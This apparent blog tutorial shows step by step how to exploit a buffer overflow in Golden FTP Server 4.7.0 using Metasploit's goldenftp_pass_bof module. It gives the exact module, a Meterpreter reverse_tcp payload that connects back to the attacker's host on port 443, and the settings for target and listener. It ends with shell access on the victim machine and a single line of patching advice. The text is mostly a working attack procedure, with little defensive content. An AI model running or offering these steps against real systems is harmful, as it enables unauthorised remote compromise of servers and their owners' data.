Type : Tutorial
Level : Medium
Victim O.S : Windows XP SP 3
Attacker O.S : Backtrack 5 R1
Vulnerability Application : Golden FTP Server 4.7.0
For you who have a web hosting maybe you will know or maybe you will rare to use FTP service for your file transfer between your computer and your web server. When you can use FTP client like Filezilla, WSFTP, etc it's because on the other side there's an FTP server that act to serve/handle any incoming request to port 21(FTP). Golden FTP was one example from so many FTP server in the net.
But today we will not learn about how to use this kind of FTP server, but about vulnerability that found in Golden FTP server application that allow attacker to inject malicious script that caused attacker can get into the system.
Below was the explanation from metasploit.com about the module that can exploiting Golden FTP server 4.7.0 :
This module exploits a vulnerability in the Golden FTP service, using the PASS command to cause a buffer overflow. Please note that in order trigger the vulnerable code, the victim machine must have the "Show new connections" setting enabled. By default, this option is unchecked.
Let's start the step by step how to perform this . . .
1. Metasploit Framework
2. Golden FTP Server 4.7.0
1. Use the exploit module that already included in metasploit framework(if you cannot found this module, run msfupdate command).
use exploit/windows/ftp/goldenftp_pass_bof set payload windows/meterpreter/reverse_tcp
2. To view the available switch for this exploit module, just run show options command. Here in this picture below I just set the required switch to perform this attack to the FTP server.
informations :set rhost 192.168.8.94 --> change the ip address into FTP server victim IP set lhost 192.168.8.92 --> change the ip address into your local attacker ip set lport 443 --> set your local port to receive payload connection
3. After everything set up correctly, now you need to choose your target. Run show targets command to view the available targets. In this tutorial my victim was using Windows XP Professional SP3, that's why I'm running set target 0 command.
4. Simple isn't it? 🙂 now run your exploit command to perform the attack.
We're already on victim machine.
If you want to do another thing inside victim machine, please read this tutorial that very useful for your knowledge.
1. Always update your software when there's an update.
Hope it's useful 🙂